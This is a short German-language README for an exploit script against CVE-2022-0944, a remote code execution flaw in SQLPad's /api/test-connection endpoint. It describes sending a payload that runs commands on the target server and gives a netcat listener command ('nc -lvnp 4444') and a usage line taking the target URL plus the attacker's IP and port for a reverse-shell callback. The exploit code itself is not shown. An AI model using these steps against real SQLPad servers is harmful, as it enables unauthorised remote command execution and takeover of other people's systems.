
Python-Exploit für CVE-2022-0944, das blinde Remote-Code-Ausführung in SQLPad über den /api/test-connection-Endpunkt mit Netcat-Callback ermöglicht.
Dieses Repository enthält ein Exploit-Skript für CVE-2022-0944 in SQLPad, eine Sicherheitslücke, die Remote Code Execution (RCE) über den Endpunkt /api/test-connection ermöglicht.
Das bereitgestellte Skript (exploit.py) zeigt, wie die RCE-Sicherheitslücke in SQLPad ausgenutzt wird. Das Skript sendet eine Payload an den verwundbaren Endpunkt und führt einen Befehl auf dem Zielserver aus.
requests-Bibliothek (kann via pip installiert werden)nc -lvnp 4444
Führen Sie das Exploit aus
python exploit.py <sqlpad_url> <attacker_ip> <attacker_port>